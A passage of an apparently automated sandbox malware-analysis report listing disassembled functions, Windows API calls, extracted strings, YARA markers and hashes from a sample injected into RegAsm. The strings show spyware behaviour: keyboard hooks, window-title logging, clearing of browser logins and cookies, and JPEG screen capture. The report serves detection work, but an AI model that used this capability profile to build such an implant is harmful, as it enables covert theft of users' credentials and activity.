                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                        • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3123878439-4028850238
                                                                        • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                        • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                        • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                        • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                        Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetCursorInfo$User32.dll
                                                                        • API String ID: 1646373207-2714051624
                                                                        • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                        • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                                        • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                        • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                                        Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                        • API String ID: 2574300362-1519888992
                                                                        • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                        • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                                        • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                        • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                                        Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm$_strrchr
                                                                        • String ID:
                                                                        • API String ID: 1036877536-0
                                                                        • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                        • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                        Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                        Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                        • __freea.LIBCMT ref: 100087D5
                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                        • String ID:
                                                                        • API String ID: 2652629310-0
                                                                        • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                        • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                        • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                        • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                        Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                        • API String ID: 3472027048-1236744412
                                                                        • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                        • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                        Function 004194C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                                        • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                                        • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                                        • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DisplayEnum$Devices$Monitors
                                                                        • String ID:
                                                                        • API String ID: 1432082543-0
                                                                        • Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                                        • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                                                        • Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                                        • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                                                        Function 004126DB Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                          • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                        • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQuerySleepValue
                                                                        • String ID: 8SG$`2U$exepath
                                                                        • API String ID: 4119054056-1749556203
                                                                        • Opcode ID: cab432d03f6a3dd98b28a842476a5545531215002f637b517e41023a51674d16
                                                                        • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                                                        • Opcode Fuzzy Hash: cab432d03f6a3dd98b28a842476a5545531215002f637b517e41023a51674d16
                                                                        • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                                                        Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                        • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 3642004256-0
                                                                        • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                        • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                        • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                        • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                        Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                                                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                                                                          • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                        • String ID: [ $ ]
                                                                        • API String ID: 3309952895-93608704
                                                                        • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                                                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                        • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                                                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                        Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SystemTimes$Sleep__aulldiv
                                                                        • String ID:
                                                                        • API String ID: 188215759-0
                                                                        • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                        • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                        • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                        • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                        Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                        • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                        Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                        • String ID:
                                                                        • API String ID: 2633735394-0
                                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                        • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                        • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                        Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 4116985748-0
                                                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                        • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                        • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                        Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                        • String ID:
                                                                        • API String ID: 1761009282-0
                                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                        • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                        • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                        Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                        • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                                        • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                        • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                                        Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 1000655C
                                                                          • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                          • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                          • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                        • String ID: *?$.
                                                                        • API String ID: 2667617558-3972193922
                                                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                        • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                        • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                        Function 0044561B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alloca_probe_16__freea
                                                                        • String ID: @5U
                                                                        • API String ID: 1635606685-921383711
                                                                        • Opcode ID: 04564325aac301ddccb6aaaabebafbb309fbd0e2890fd74aba7b5200b612b725
                                                                        • Instruction ID: 8ea394e19242d531593115f3ad9b67f2d9726ff50e2d779c509e1c2fd2e4051b
                                                                        • Opcode Fuzzy Hash: 04564325aac301ddccb6aaaabebafbb309fbd0e2890fd74aba7b5200b612b725
                                                                        • Instruction Fuzzy Hash: F141D431A00511EBFF219B65CC42A5F77A4EF55720F65452BF808DB252EB3CD841C66D
                                                                        Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418ABE
                                                                          • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                          • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                          • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                        • String ID: image/jpeg
                                                                        • API String ID: 1291196975-3785015651
                                                                        • Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                                        • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
